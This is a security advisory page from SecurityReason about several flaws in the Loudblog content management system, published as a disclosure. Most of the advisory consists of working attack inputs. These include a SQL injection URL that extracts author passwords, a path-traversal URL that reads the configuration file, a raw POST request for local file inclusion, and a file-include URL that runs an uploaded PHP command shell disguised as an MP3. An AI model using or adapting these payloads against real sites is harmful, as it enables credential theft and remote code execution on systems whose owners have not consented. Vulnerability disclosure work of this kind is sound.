|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 556 CVE : CVE-2006-0565 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : tzitaroth gmail com Published : 08.03.2006
Advisory Content : "Loudblog is a sleek and easy-to-use Content Management System (CMS) for publishing media content on the web." SQL Injection in podcast.php (magic_quotes=off): http://[target]/loudblog/podcast.php?id=1' and '1'='0' union select password,null,null,null,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null from lb_authors where '1'='1' /* Read local files (index.php): http://[target]/loudblog/index.php?template=../../../loudblog/custom/con fig.php%00 Local php file include (loudblog/inc/backend_settings.php): POST /loudblog/loudblog/inc/backend_settings.php HTTP/1.1 Host: [target] Content-Type: application/x-www-form-urlencoded Content-Length: 23 language=../../../index Local file include (upload a cmdphp.mp3 comment, include it, must have access to admin panel): http://[target]/loudblog/loudblog/index.php?page=/../../../audio/cmdphp. mp3%00 ~kuze  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |